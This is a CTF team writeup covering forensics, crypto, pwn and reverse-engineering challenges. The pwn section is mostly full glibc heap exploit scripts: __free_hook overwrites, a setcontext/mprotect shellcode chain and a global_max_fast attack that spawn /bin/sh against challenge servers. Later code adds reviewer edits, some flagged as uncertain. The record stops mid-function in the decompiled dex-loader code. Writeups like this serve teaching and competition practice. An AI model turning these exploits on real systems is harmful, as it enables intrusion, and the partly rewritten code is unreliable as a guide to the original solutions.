Arr3stY0u 战队 WRITEUP
一、 战队信息
战队名称:Arr3stY0u
战队排名:2
二、 解题情况
三、 解题过程
misc
strange_forensics
先无脑 strings 一个个试过去 可以得到 flag3,Ux_forEnsIcs_MASTER
直接 vol 跑不出来,识别不到 profile
strings 1.mem | grep "Linux version" 先查看一下 linux 版本是 Ubuntu18.04.1,内核是 5.4.0-84-g
参考[(17 条消息) 制作 Linux 内存镜像+制作对应的 volatility profile_shu 天的博客-CSDN 博客 _ 内存镜像](https://blog.csdn.net/weixin_46081055/article/details/121897319) 做一下 profile,扔进 volatility/volatility/plugins/overlays/linux,成功识别到内存对应的 profile
ps:这里 linux 的 volatility 出了点问题,换成 windows 下了
提取一下 shadow,用 hashcat 直接跑,得到第一段 flag
bob1$C5/bIl1n$9l5plqPKK4DjjqpGHz46Y/:19283:0:99999:7:::
890topico
find_file 不知道为什么报错了,用 lsof 看到 secret.zip
提取出来发现压缩包数据错误,crc 爆破无果想到之前比赛的思路改一下加密位,爆破一下,
得到 flag2,_y0u_Ar3_tHe_Lin
最终 flag,flag{890topico_y0u_Ar3_tHe_LInUx_forEnsIcS_MASTER}
crypto
babyDLP
原题 找了个脚本直接跑的
from pwn import *
from sage import *
from Crypto.Util.number import *
# NOTE(review): routes the remote() connection below through a SOCKS proxy on
# localhost; looks like a leftover from local testing — confirm before running.
context.proxy = 'localhost'
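class Gao:
    """Bit-by-bit recovery of the hidden exponent behind the babyDLP oracle.

    Every round sends ``'T'`` and then ``nth_root(base, s_high)`` computed in
    Z/pZ (Sage), and reads one reply line.  A reply containing ``'Great!'``
    means the guess was accepted; otherwise the line, after an 8-character
    prefix, holds a literal ``(t, r)`` pair whose first entry decides the next
    exponent bit.  The oracle contract is inferred from the queries below —
    confirm against the service source if available.
    """

    def __init__(self):
        # self.conn = process(['python3', 'another.py'])
        self.conn = remote('101.201.71.136', 38476)
        # 1024-bit prime fixed by the challenge
        self.p = 2 ** 1024 - 2 ** 234 - 2 ** 267 - 2 ** 291 - 2 ** 403 - 1
        self.s_high = 1     # recovered high bits of the exponent, MSB first
        self.t = None       # last oracle bit, set by gao_one() on a rejected guess
        self.Zp = Zmod(self.p)

    def _reply(self):
        """Read the oracle's answer line as text.

        pwntools returns bytes on Python 3, where ``'Great!' in a`` would raise
        TypeError; decoding makes the checks below work on either version.
        """
        self.conn.recvuntil(b'integer: \n')
        line = self.conn.recvline()
        return line.decode() if isinstance(line, bytes) else line

    def gao_check(self):
        """Probe with base 4.

        Returns True (and prints the reply and the bit length of the guess)
        when the oracle accepts, i.e. ``s_high`` is the complete exponent.
        """
        self.conn.sendline(b'T')
        ans = self.Zp(4).nth_root(self.s_high)
        print('Guessing: {}'.format(ans))
        self.conn.sendline(str(ans).encode())
        reply = self._reply()
        if 'Great!' in reply:
            print(reply)
            print(ZZ(ans).nbits())
            return True
        return False

    def gao_one(self):
        """Probe with base 2 and append one bit to ``s_high``.

        Returns True when the oracle accepts the guess.  Otherwise parses the
        ``(t, r)`` pair from the reply, shifts ``s_high`` left and sets the new
        low bit to ``1 - t``; ``self.t`` keeps ``1 - t`` so gao() knows whether
        a base-4 check round is needed.
        """
        import ast  # local import: parse the reply without eval()

        self.conn.sendline(b'T')
        ans = self.Zp(2).nth_root(self.s_high)
        self.conn.sendline(str(ans).encode())
        reply = self._reply()
        if 'Great!' in reply:
            print(reply)
            print(ZZ(ans).nbits())
            return True
        # The reply is network input: literal_eval only accepts a plain tuple
        # literal, whereas the original eval() would execute anything sent back.
        t, r = ast.literal_eval(reply[8:].strip())
        self.s_high <<= 1
        if t == 0:
            self.s_high |= 1
        self.t = 1 - t
        print('{:b}'.format(self.s_high))
        return False

    def gao(self):
        """Run gao_one() until accepted; after a round with t == 1 also try gao_check()."""
        while True:
            if self.gao_one():
                break
            if self.t == 1 and self.gao_check():
                break

    def gao_2(self):
        """Recover up to 1023 bits, then try peeling low bits off with gao_check().

        The ``else`` belongs to the ``for`` (runs only when no guess was
        accepted); the paste lost the indentation, so this reading is the one
        that does not destroy ``s_high`` on every rejected round.
        """
        for _ in range(1023):
            if self.gao_one():
                break
        else:
            for _ in range(20):
                self.gao_check()
                self.s_high >>= 1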
if __name__ == '__main__':
    # Script entry: open the connection and run the 1023-bit recovery strategy.
    Gao().gao_2()
common_rsa
直接分解 n 解 rsa
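# common_rsa: n factors directly (p was found by factoring), so the private
# exponent follows from phi = (p-1)(q-1).  The paste split every big number
# across lines, which is a SyntaxError; they are rebuilt from adjacent string
# literals.  Stdlib only: pow(e, -1, phi) replaces gmpy2.invert and
# int.to_bytes replaces Crypto's long_to_bytes.
n = int(
    "2537849084284811715206447958256281198235061766726834565445396756138957493"
    "5706794446579649289936308746565274995106902124872987149871645012275967526"
    "6109104893465718371075137027806815473672093804600537277140261127375373193"
    "0531731637112343096190169408188931905498117788226411655860709527788252266"
    "69497115448984409"
)
e = int(
    "3140677571589956016278786997470001694759584043870824754952079477501360981"
    "8293759112173738791912355029131497095419469938722402909767606953171285102"
    "663874040755958087885460234337741136082351825063419747360169129165"
)
c = int(
    "9772407384319956312629913855710006220811930961417535410456679599987885585"
    "1589393774478499956448658027850289531621583268783154684298592331328032682"
    "3168683911202855150769118927370518421163941654236702754222438942204221961"
    "9333655138298669975975623296257333629103257296806058613631790159541479622"
    "9127047082707519"
)
p = int(
    "2100714968473145706833211326609777591663024907923029373568408546014570"
    "0796880956996855348862572729597251282134827276249945199994121834609654781"
    "077209340587"
)
q = n // p
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)  # modular inverse; raises ValueError if gcd(e, phi) != 1
m = pow(c, d, n)
# plaintext as big-endian bytes
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))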
tracing
直接逆着跑一边还原
from Crypto.Util.number import *
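# tracing: undo the operations recorded in trace.out to recover the value of
# ``a`` the modulus for the inverse was derived from.  Each helper is the
# INVERSE of the operation named in the trace (names kept so the trace lines
# read naturally): rshift1 undoes a right shift by shifting left, lshift
# undoes a left shift, and "a = a - b" is undone by adding b back.
# The paste split c and n across lines (a SyntaxError); rebuilt below.
c = int(
    "6488587531755609055823899406625680505221386416151443528574889156177986"
    "7972960805879348109302233463726130814478875296026610171472811894585459078"
    "4603331314913923473463674222767011283807395988731562791736396911268144117"
    "5265727983880478055018686363751044572020610396299408750740729681466227060"
    "5713097055799853102"
)
n = int(
    "1137935134908948811755682524066660811089167912079475451984286417927681"
    "1058108335931848235548572447640720467917157837674197295850628487247009649"
    "8674038813765700336353715590069074081309886710425934960057225969468061891"
    "3269463984921948125942198905531850433909155092009302036550224204440278419"
    "86189782168065174301"
)
e = 65537
with open('trace.out', 'rb') as trace:
    f = trace.read()
b = 0
a = 1


def isOdd(a):
    """True when ``a`` is odd (unused below; kept from the original)."""
    return a & 1 == 1


def rshift1(a):
    """Inverse of a 1-bit right shift."""
    return a << 1


def lshift(a, s):
    """Inverse of a left shift by ``s``."""
    return a >> s


# NOTE(review): every iteration tests the WHOLE trace for each substring, so a
# matching operation is re-applied len(f) times rather than once per trace
# line; a reversed per-line walk looks intended — confirm against trace.out
# before trusting the recovered value.
for i in range(len(f)):
    if b'a, b = b, a' in f:
        a, b = b, a
    if b'a = rshift1(a)' in f:
        a = rshift1(a)
    if b'b = rshift1(b)' in f:
        b = rshift1(b)
    if b'a = a - b' in f:
        a = a + b
d = pow(e, -1, a)  # originally inverse(65537, a); stdlib modular inverse
m = pow(c, d, n)
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))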
fill
先解 lcg,再解一个背包
from hashlib import sha256
import gmpy2
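# fill: first recover the LCG (s[i] = m*s[i-1] + c mod n) from three outputs,
# subtract its stream from the 32 public weights, then solve the subset-sum
# with LLL on the usual knapsack lattice.
S = 492226042629702           # target sum of the knapsack
s = [562734112, 859151551, 741682801]
M = [19621141192340, 39617541681643, 3004946591889, 6231471734951,
     3703341368174, 48859912097514, 4386411556216, 11028070476391, 18637548953150,
     29985057892414, 20689980879644, 20060557946852, 46908191806199, 8849137870273,
     28637782510640, 35930273563752, 20695924342882, 36660291028583,
     10923264012354, 29810154308143, 4444597606142, 31802472725414, 23368528779283,
     15179021971456, 34642073901253, 44824809996134, 31243873675161,
     27159321498211, 2220647072602, 20255746235462, 24667528459211, 46916059974372]
n = 991125622                 # LCG modulus
# multiplier and increment from consecutive differences (stdlib pow(-1) replaces gmpy2.invert)
m = (s[2] - s[1]) * pow(s[1] - s[0], -1, n) % n
c = (s[1] - m * s[0]) % n
for i in range(3, 32):
    s.append((s[i - 1] * m + c) % n)
for t in range(32):
    M[t] = M[t] - s[t]
# Knapsack lattice: identity block, the weights in the last column and -S in
# the corner.  The original indexed the matrix with the LCG modulus ``n`` and
# assigned the whole list ``M`` to one cell, which cannot run; the dimension is
# the number of weights and the target is S (the original wrote -c, the LCG
# increment, which is not the knapsack target).
DIM = len(M)
A = Matrix(ZZ, DIM + 1, DIM + 1)
for i in range(DIM):
    A[i, i] = 1
    A[i, DIM] = M[i]
A[DIM, DIM] = -S
res = A.LLL()
#print(res)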
#print(res)
little little fermat
n 直接分解,使用费马小定律求 x
from Crypto.Util.number import *
import gmpy2
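# little little fermat: n factors directly; the plaintext is additionally
# masked with x = (q-1)^2, for which 114514^x == 1 (mod q) by Fermat's little
# theorem.  Big numbers were split across lines by the paste (a SyntaxError)
# and are rebuilt from adjacent string literals; stdlib replaces gmpy2/Crypto.
n = int(
    "1413210673257164263754835069152249300972468659604741550690401763568607074"
    "3554027091108158975147178351963999658958949587721449719649897845300515427"
    "2785048418715013714419926299248566038773669282170912502161620702945933984"
    "6808802877578628378804741840040826198807937335171912974699802463156239245"
    "71332042031367393"
)
c = int(
    "8136876283135898034875730394017899471881865667977445030053321501611795941"
    "2236853310026456227434535301960147956843664862777300751319650636299943068"
    "6200070670639454533109928284980835562053520256386006431378495630809967978"
    "8850302715352731552465800325176718742738279645197411836254650778885434908"
    "6917112114926883"
)
e = 65537
q = int(
    "1188785377289426564283464992957815718084824093908416422233447605748748"
    "5972806971092902627112665734648016476153593841839977704512156756634066593"
    "725142934001"
)
p = n // q
x = (q - 1) ** 2
# sanity check of the mask exponent (an explicit raise instead of assert, which -O strips)
if pow(114514, x, q) != 1:
    raise ValueError("114514^x != 1 mod q: x is not a multiple of the group order")
d = pow(e, -1, (p - 1) * (q - 1))
m = pow(c, d, n)
flag = m ^ x
print(flag.to_bytes((flag.bit_length() + 7) // 8, 'big'))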
pwn
bitheap
from pwncli import *
cli_script()                       # pwncli: parse the command line and populate ``gift``
set_remote_libc('libc-2.27.so')    # libc matching the remote target
io: tube = gift.io                 # connection/process tube
elf: ELF = gift.elf                # target binary
libc: ELF = gift.libc              # resolved libc (symbols used below)
def cmd(i, prompt="Your choice: "):
    """Answer the menu prompt with choice ``i`` (pwncli sendlineafter)."""
    sla(prompt, i)
def add(i, sz):
    """Menu 1: allocate slot ``i`` with ``sz`` bytes."""
    cmd('1')
    for prompt, value in (("Index: ", i), ("Size: ", sz)):
        sla(prompt, str(value))
def edit(i, data):
    """Menu 2: write ``data`` into slot ``i`` (sent raw after the prompt)."""
    cmd('2')
    index = str(i)
    sla("Index: ", index)
    sa("Content: ", data)
def show(i):
    """Menu 3: print slot ``i``; the caller reads the output."""
    choice, index = '3', str(i)
    cmd(choice)
    sla("Index: ", index)
def dele(i):
    """Menu 4: free slot ``i``."""
    choice, index = '4', str(i)
    cmd(choice)
    sla("Index: ", index)
def int2bin_str(x):
    """Return ``x`` as exactly 64 binary digits, least-significant bit first.

    This is the bit-string encoding the target expects for each qword.
    """
    digits = bin(x)[2:]
    return digits.rjust(64, '0')[::-1]
# ---- exploit body (the paste lost all indentation; reconstructed) ----
# Phase 1: heap layout and a heap-pointer leak via a reused 0x200 chunk.
for i in range(10):
    add(i, 0xf0)
add(10, 0x200)
add(11, 0x200)
dele(11)
dele(10)
add(10, 0x200)
show(10)
ru("Content: ")
m = rl()
heapaddr = u64_ex(m[:-1])   # pointer left in the reused chunk's data
leak("heapaddr", heapaddr)
# Phase 2: libc leak from a chunk freed after the 0xf0 bins are filled.
for i in range(7):
    dele(i+3)
dele(1)
add(1, 0x78)
show(1)
lbaddr = recv_current_libc_addr()
lb = set_current_libc_base_and_log(lbaddr, 0x3ebd90)   # 0x3ebd90: offset of the leaked pointer inside libc
add(3, 0x78)
# Contents are sent as bit strings: int2bin_str() gives 64 LSB-first digits per qword.
edit(3, 0x70 * 8 * "a" + int2bin_str(0x200) + "0")
dele(0)
dele(2)
dele(1)
add(0, 0x110)
# last qword of chunk 0 := address of __free_hook
edit(0, b"a" * 0x100 * 8 + int2bin_str(libc.sym.__free_hook).encode())
add(1, 0x78)
add(2, 0x78)
add(11, 0x200)
# Chunk 11 contents, keyed by offset from the chunk start.  0x100 holds the
# staged machine code (mmap an RWX page, copy the 32-byte payload at 0x180
# there, then switch to 32-bit mode via retf); 0x180 holds that payload.
layout = {
0: heapaddr+0x100,
0xa0: heapaddr,
0xa8: libc.sym.mprotect,
0x68: heapaddr & ~0xfff,
0x70: 0x4000,
0x88: 7,
0x100: asm(
shellcraft.amd64.linux.mmap_rwx(address=0x400000) +
shellcraft.amd64.memcpy(0x400800, heapaddr+0x180, 0x20)
) + asm("""
xor esp, esp
mov rsp, 0x400100
mov eax, 0x23
mov [rsp+4], eax
mov eax, 0x400800
mov [rsp], eax
retf
"""),
0x180: ShellcodeMall.i386.execve_bin_sh
}
pl = flat(layout, filler="\x90")
# re-encode the flat payload qword by qword into the target's bit-string format
last = ""
for x in range(0, len(pl), 8):
    last += int2bin_str(u64_ex(pl[x:x+8]))
edit(11, last)
edit(2, int2bin_str(libc.sym.setcontext+53).encode())   # chunk 2 := setcontext+53
dele(11)
sleep(0.2)
sl("cat flag")
ia()
leak
from pwncli import *
cli_script()                       # pwncli: parse the command line and populate ``gift``
set_remote_libc('libc-2.27.so')    # libc matching the remote target
io: tube = gift.io                 # connection/process tube
elf: ELF = gift.elf                # target binary
libc: ELF = gift.libc              # resolved libc
@stopwatch(2)   # pwncli: abort the menu interaction after 2 seconds (a hung target means a failed attempt)
def cmd(i, prompt="Your choice: "):
    """Answer the menu prompt with choice ``i``."""
    sla(prompt, i)
def add(i, sz):
    """Menu 1: allocate slot ``i`` with ``sz`` bytes."""
    cmd('1')
    for prompt, value in (("Index: ", i), ("Size: ", sz)):
        sla(prompt, str(value))
def edit(i, data):
    """Menu 2: write ``data`` into slot ``i`` (sent raw after the prompt)."""
    cmd('2')
    index = str(i)
    sla("Index: ", index)
    sa("Content: ", data)
def dele(i):
    """Menu 3: free slot ``i`` (this binary has no show option)."""
    choice, index = '3', str(i)
    cmd(choice)
    sla("Index: ", index)
@smart_enumerate_attack(loop_time=16)   # pwncli: re-run exp() up to 16 times
def exp():
    """One attempt of the leak exploit.

    Indentation was lost in the paste and is reconstructed here.  The attempt
    ends by raising: ``PwncliExit`` once the output looks like a flag, else
    ``OSError`` (presumably what makes the decorator retry — confirm).
    """
    add(0, 0x80)
    add(1, 0x20)
    for i in range(8):
        edit(0, flat(0, 0))   # assumed to sit inside the loop with dele(0) — confirm
        dele(0)
    add(2, 0x20)
    if gift.debug:
        off = gift._libc_base + 0x3ed940 # global_max_fast
    else:
        off = 0x6940
    off &= 0xffff            # only the low 16 bits are written (partial overwrite)
    edit(2, p16(off))
    add(3, 0x80)
    add(4, 0x80)
    dele(2)
    edit(2, flat(0, 0))
    dele(2)
    edit(2, "\x40")
    add(5, 0x20)
    add(6, 0x20)
    edit(6, flat(0, 0x1181))
    dele(2)
    edit(2, flat(0, 0))
    dele(2)
    edit(2, "\x50")
    add(7, 0x20)
    add(8, 0x20) # **** to free
    edit(8, flat(0, 0x41))
    add(9, 0x2000)
    edit(9, flat({0x1060:[0, 0x21, 0, 0]*3}))
    dele(9)
    add(10, 0x200)
    edit(4, flat(0x1200)) # global_max_fast
    dele(8)
    edit(6, "a"*0x20)
    edit(9, b"a"*0x208+p32(0x11))
    add(11, 0x2000)
    m = ra(timeout=3)    # whatever the target prints within 3 s
    if b"flag" in m or b"FLAG" in m or b"{" in m:
        print(m)
        raise PwncliExit()
    else:
        raise OSError()
# NOTE(review): indentation was lost; if ia() sat inside exp() it is unreachable
# (both branches above raise), and at top level it would block before exp()
# runs — confirm its placement against the original script.
ia()
exp()
queue
import functools
from pwncli import *
cli_script()                       # pwncli: parse the command line and populate ``gift``
set_remote_libc('libc-2.27.so')    # libc matching the remote target
io: tube = gift.io                 # connection/process tube
elf: ELF = gift.elf                # target binary
libc: ELF = gift.libc              # resolved libc (symbols used below)
def show_name(func):
    """Decorator that logs the callee's name and arguments before each call.

    Logging goes through pwncli's ``log_ex``.  Not applied to any helper in
    this script; kept as a debugging aid.
    """
    @functools.wraps(func)
    def _logged(*args, **kwargs):
        log_ex("call func: {}, args: {} {}".format(func.__name__, args, kwargs))
        return func(*args, **kwargs)
    return _logged
def cmd(i, prompt="Queue Management: "):
    """Answer the menu prompt with choice ``i``."""
    sla(prompt, i)
def add(sz):
    """Menu 1: push a new element of ``sz`` bytes (no index: it is a queue)."""
    size = str(sz)
    cmd('1')
    sla("Size: ", size)
def edit(i1, i2, num):
    """Menu 2: set value slot ``i2`` of element ``i1`` to the integer ``num``."""
    cmd('2')
    for prompt, value in (("Index: ", i1), ("Value idx: ", i2), ("Value: ", num)):
        sla(prompt, str(value))
def show(i, num):
    """Menu 3: dump ``num`` values of element ``i``; consumes the "Content: " prefix."""
    cmd('3')
    for prompt, value in (("Index: ", i), ("Num: ", num)):
        sla(prompt, str(value))
    ru("Content: ")
def dele():
    """Menu 4: pop (free) the element at the head of the queue."""
    cmd('4')
def gift_(i, data):
    """Hidden menu 666: overwrite element ``i``'s header/data with ``data``."""
    index = str(i)
    cmd('666')
    sla("Index: ", index)
    sa("Content: ", data)
# ---- exploit body (indentation lost in the paste; reconstructed) ----
add(0x100)
# element 0's third field := 0x88, then read 8 values back; show() prints
# them as hex text, hence the fromhex/decode dance
gift_(0, flat(0, 0, "\x88"))
show(0, 0x8)
msg = rs(8)
heapaddr = u64_ex(bytes.fromhex(b"".join(msg).decode()))   # assumes rs() returns a list of hex byte strings — confirm
leak("heapaddr", heapaddr)
# gift_(0, flat(0, 0, heapaddr+0x1000, heapaddr+0x1000))
# edit(0, 0, 0xff)
for i in range(7):
    add(0x100)
for i in range(6):
    dele()
# point element 0 at heapaddr+0x1a50 and read a libc pointer from there
gift_(0, flat(0, 0, heapaddr+0x1a50))
show(0, 0x8)
msg = rs(8)
libcaddr = u64_ex(bytes.fromhex(b"".join(msg).decode()))
leak("libcaddr", libcaddr)
set_current_libc_base_and_log(libcaddr, 0x3ebca0)   # 0x3ebca0: offset of the leaked pointer inside libc
# element 0 now aliases __free_hook; write system there byte by byte
gift_(0, flat(0, 0, libc.sym.__free_hook, libc.sym.__free_hook))
for i,x in enumerate(p64_ex(libc.sym.system)):
    edit(0, i, x)
# then alias heapaddr+0x17f0 and write "/bin/sh" there, so the next pop frees it
gift_(0, flat(0, 0, heapaddr+0x17f0, heapaddr+0x17f0))
for i,x in enumerate(b"/bin/sh\x00"):
    edit(0, i, x)
dele()
sleep(0.1)
sl("cat flag")
ia()
sandboxheap
from pwncli import *
cli_script()                       # pwncli: parse the command line and populate ``gift``
set_remote_libc('libc-2.27.so')    # libc matching the remote target
io: tube = gift.io                 # connection/process tube
elf: ELF = gift.elf                # target binary
libc: ELF = gift.libc              # resolved libc (symbols used below)
def cmd(i, prompt="Your choice: "):
    """Answer the menu prompt with choice ``i`` (pwncli sendlineafter)."""
    sla(prompt, i)
def add(i, sz):
    """Menu 1: allocate slot ``i`` with ``sz`` bytes."""
    cmd('1')
    for prompt, value in (("Index: ", i), ("Size: ", sz)):
        sla(prompt, str(value))
def edit(i, data):
    """Menu 2: write ``data`` into slot ``i`` (sent raw after the prompt)."""
    cmd('2')
    index = str(i)
    sla("Index: ", index)
    sa("Content: ", data)
def show(i):
    """Menu 3: print slot ``i``; the caller reads the output."""
    choice, index = '3', str(i)
    cmd(choice)
    sla("Index: ", index)
def dele(i):
    """Menu 4: free slot ``i``."""
    choice, index = '4', str(i)
    cmd(choice)
    sla("Index: ", index)
def int2bin_str(x):
    """Return ``x`` as exactly 64 binary digits, least-significant bit first.

    This is the bit-string encoding the target expects for each qword.
    """
    digits = bin(x)[2:]
    return digits.rjust(64, '0')[::-1]
# ---- exploit body: identical to the bitheap script above (same binary
# layout, same payload); indentation reconstructed from the paste ----
for i in range(10):
    add(i, 0xf0)
add(10, 0x200)
add(11, 0x200)
dele(11)
dele(10)
add(10, 0x200)
show(10)
ru("Content: ")
m = rl()
heapaddr = u64_ex(m[:-1])   # pointer left in the reused chunk's data
leak("heapaddr", heapaddr)
for i in range(7):
    dele(i+3)
dele(1)
add(1, 0x78)
show(1)
lbaddr = recv_current_libc_addr()
lb = set_current_libc_base_and_log(lbaddr, 0x3ebd90)   # 0x3ebd90: offset of the leaked pointer inside libc
add(3, 0x78)
# Contents are sent as bit strings: int2bin_str() gives 64 LSB-first digits per qword.
edit(3, 0x70 * 8 * "a" + int2bin_str(0x200) + "0")
dele(0)
dele(2)
dele(1)
add(0, 0x110)
# last qword of chunk 0 := address of __free_hook
edit(0, b"a" * 0x100 * 8 + int2bin_str(libc.sym.__free_hook).encode())
add(1, 0x78)
add(2, 0x78)
add(11, 0x200)
# Chunk 11 contents, keyed by offset from the chunk start; 0x100 holds the
# staged machine code and 0x180 the 32-bit payload it copies.
layout = {
0: heapaddr+0x100,
0xa0: heapaddr,
0xa8: libc.sym.mprotect,
0x68: heapaddr & ~0xfff,
0x70: 0x4000,
0x88: 7,
0x100: asm(
shellcraft.amd64.linux.mmap_rwx(address=0x400000) +
shellcraft.amd64.memcpy(0x400800, heapaddr+0x180, 0x20)
) + asm("""
xor esp, esp
mov rsp, 0x400100
mov eax, 0x23
mov [rsp+4], eax
mov eax, 0x400800
mov [rsp], eax
retf
"""),
0x180: ShellcodeMall.i386.execve_bin_sh
}
pl = flat(layout, filler="\x90")
# re-encode the flat payload qword by qword into the target's bit-string format
last = ""
for x in range(0, len(pl), 8):
    last += int2bin_str(u64_ex(pl[x:x+8]))
edit(11, last)
edit(2, int2bin_str(libc.sym.setcontext+53).encode())   # chunk 2 := setcontext+53
dele(11)
sleep(0.2)
sl("cat flag")
ia()
reverse
GetTheCorrectKey
解密文本
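# IDAPython: each (ea, key, size) triple names a string in the binary that is
# XOR-obfuscated with a one-byte key; decode them in place so the decompiler
# shows plaintext.  get_bytes reads size+1 bytes (the terminator included).
s = [(118788, 53, 4),
(118800, 245, 20),
(118821, 214, 15),
(118837, 40, 5),
(118848, 79, 24),
(118880, 225, 25),
(118906, 180, 4),
(118912, 22, 21),
(118944, 17, 26),
(118976, 156, 21),
(119008, 113, 30),
(119039, 116, 14),
(119056, 240, 27),
(119088, 166, 16),
(119120, 52, 19),
(119140, 28, 3),
(119144, 227, 15),
(119160, 146, 1),
(119162, 130, 9),
(119184, 207, 17),
(119216, 143, 37),
(119254, 244, 14),
(119280, 194, 20),
(119312, 61, 22),
(119335, 10, 5),
(119344, 56, 22),
(119376, 147, 28),
(119408, 227, 19),
(119440, 25, 25),
(119496, 60, 9),
(119520, 139, 36),
(119568, 79, 32),
(119601, 213, 6),
(119616, 230, 61),
(119678, 198, 10),
(119696, 201, 39),
(119736, 93, 9),
(119746, 236, 3),
(119750, 242, 4),
(119760, 101, 41),
(119808, 107, 19),
(119828, 98, 4),
(119833, 71, 7),
(119856, 3, 19),
(119876, 123, 8),
(119888, 47, 24),
(119913, 184, 3),
(119920, 63, 25),
(119946, 140, 8),
(119968, 58, 20),
(120000, 110, 37),
(120038, 40, 15),
(120054, 208, 14),
(120080, 186, 25),
(120112, 131, 29),
(120142, 123, 8),
(120160, 153, 27),
(120192, 165, 25),
(120218, 198, 11),
(120240, 69, 36),
(120288, 185, 36),
(120325, 131, 6),
(120336, 39, 47),
(120384, 224, 19),
(120404, 227, 3),
(120416, 239, 21),
(120438, 202, 7),
(120448, 106, 21),
(120470, 253, 3),
(120480, 9, 0x18)]
for ea, key, size in s:
    b = bytearray(ida_bytes.get_bytes(ea, size+1))
    for i in range(len(b)):
        # the paste dropped the index: ``b ^= key`` is a TypeError on a bytearray
        b[i] ^= key
    print(hex(ea), b)
    ida_bytes.patch_bytes(ea, bytes(b))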
解密 SMC
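# IDAPython: XOR-decode the self-modifying code region (key 0x12) in place so
# it can be disassembled; the 31-byte prologue of the region is left alone.
s = [(0x9994+31, 0x12, 287-31)]
for ea, key, size in s:
    b = bytearray(ida_bytes.get_bytes(ea, size+1))
    for i in range(len(b)):
        # the paste dropped the index: ``b ^= key`` is a TypeError on a bytearray
        b[i] ^= key
    ida_bytes.patch_bytes(ea, bytes(b))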
逆向 xxxxx 函数
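// Decompiler (IDA) output of the native routine that loads the hidden dex.
// Judging by the JNI calls and string constants: find the app's Application
// object and its AssetManager, open the asset "whoami.bin", read it into a
// malloc'd buffer, XOR-decode it (0x56 for the first 32 bytes, 0x78 for the
// rest), wrap it in a ByteBuffer, hand it to what appears to be
// dalvik.system.InMemoryDexClassLoader, and splice that loader's
// pathList.dexElements in front of the app class loader's.  Returns SMC().
// The paste lost the index in the first XOR loop (`ptr ^= 0x56u`); restored
// to `ptr[i]` to match the second loop and the Python re-implementation.
char *__fastcall xxxxx(JNIEnv *a1)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
  v1 = SMC();
  *(_BYTE *)(2 * (_DWORD)v1) = (_BYTE)v1;
  // Application object via ActivityThread's mInitialApplication field
  Class = FindClass(a1, (int)aAndroidAppActi);
  v55 = sub_A060(a1, Class, asc_1D230, aLandroidAppAct_0);
  FieldID = GetFieldID(a1, (int)Class, (int)aMinitialapplic, (int)aLandroidAppApp_0);
  v53 = sub_A0F0((int)a1, (int)Class, v55);
  ObjectField = GetObjectField(a1, v53, (int)FieldID);
  v51 = FindClass(a1, (int)aAndroidAppAppl);
  getAssets = GetMethodID(a1, (int)v51, aGetassets, aLandroidConten_0);
  v49 = CallObjectMethodV(a1, ObjectField, getAssets);
  v48 = FindClass(a1, (int)aAndroidContent);
  openFd = GetMethodID(a1, (int)v48, aOpenfd, aLjavaLangStrin_0);
  v46 = NewStringUTF(a1, (int)aWhoamiBin);
  v45 = CallObjectMethodV(a1, v49, openFd, v46);
  v44 = FindClass(a1, (int)aAndroidContent_0);
  getLength = GetMethodID(a1, (int)v44, aGetlength, aJ);
  size = CallLongMethodV(a1, (int)v45, (int)getLength);
  open = GetMethodID(a1, (int)v48, aOpen, aLjavaLangStrin_1);
  v40 = CallObjectMethodV(a1, v49, open, v46);
  v39 = NewByteArray(a1, size);
  v38 = FindClass(a1, (int)aJavaIoInputstr);
  read = GetMethodID(a1, (int)v38, aRead, aBiiI);
  v36 = CallIntMethodV(a1, (int)v40, (int)read, v39, 0, size);
  ptr = malloc(size);
  if ( v36 >= 1 )
    GetByteArrayRegion(a1, (int)v39, 0, size, (int)ptr);
  // two-key XOR: 0x56 over the first 32 bytes, 0x78 over the remainder
  for ( i = 0; i <= 31; ++i )
    ptr[i] ^= 0x56u;
  for ( j = 32; j < size; ++j )
    ptr[j] ^= 0x78u;
  SetByteArrayRegion(a1, (int)v39, 0, size, (int)ptr);
  if ( ptr )
    free(ptr);
  // ByteBuffer.allocate(size).put(bytes).position(0)
  v32 = FindClass(a1, (int)aJavaNioBytebuf);
  StaticMethodID = GetStaticMethodID(a1, (int)v32, (int)aAllocate, (int)aILjavaNioByteb);
  v30 = (void *)sub_8FA0(a1, v32, StaticMethodID);
  MethodID = GetMethodID(a1, (int)v32, aPut, aBLjavaNioByteb);
  v28 = GetMethodID(a1, (int)v32, aPosition, aILjavaNioBuffe);
  CallObjectMethodV(a1, v30, MethodID, v39);
  CallObjectMethodV(a1, v30, v28, 0);
  // class loader of the app's own class, plus the pathList/dexElements field ids
  v27 = FindClass(a1, (int)aComCtfGettheco);
  v26 = FindClass(a1, (int)aJavaLangClass);
  v25 = GetMethodID(a1, (int)v26, aGetclassloader, aLjavaLangClass);
  v24 = CallObjectMethodV(a1, v27, v25);
  v23 = FindClass(a1, (int)aDalvikSystemPa);
  v22 = GetFieldID(a1, (int)v23, (int)aPathlist, (int)aLdalvikSystemD);
  v21 = FindClass(a1, (int)aDalvikSystemDe);
  v20 = GetFieldID(a1, (int)v21, (int)aDexelements, (int)aLdalvikSystemD_0);
  // new <in-memory dex class loader>(ByteBuffer, parent) — class name inferred from the string id
  v19 = FindClass(a1, (int)aDalvikSystemIn);
  v18 = GetMethodID(a1, (int)v19, aInit, aLjavaNioBytebu);
  v17 = NewObjectV(a1, (int)v19, (int)v18, v30, v24);
  v16 = GetObjectField(a1, (int)v17, (int)v22);
  v15 = GetObjectField(a1, (int)v16, (int)v20);   // new loader's dexElements
  v14 = GetObjectField(a1, (int)v24, (int)v22);
  v13 = GetObjectField(a1, (int)v14, (int)v20);   // app loader's dexElements
  // merged = new ArrayList(); merged.addAll(v15); merged.addAll(v13)
  v12 = FindClass(a1, (int)aJavaUtilArrayl);
  v11 = GetMethodID(a1, (int)v12, aAdd, aLjavaLangObjec);
  v10 = GetMethodID(a1, (int)v12, aToarray, aLjavaLangObjec_0);
  v9 = GetMethodID(a1, (int)v12, aInit, aV);
  v8 = NewObjectV(a1, (int)v12, (int)v9);
  for ( k = 0; k < GetArrayLength(a1, (int)v15); ++k )
  {
    ObjectArrayElement = GetObjectArrayElement(a1, (int)v15, k);
    CallBooleanMethodV(a1, (int)v8, (int)v11, ObjectArrayElement);
  }
  for ( m = 0; m < GetArrayLength(a1, (int)v13); ++m )
  {
    v4 = GetObjectArrayElement(a1, (int)v13, m);
    CallBooleanMethodV(a1, (int)v8, (int)v11, v4);
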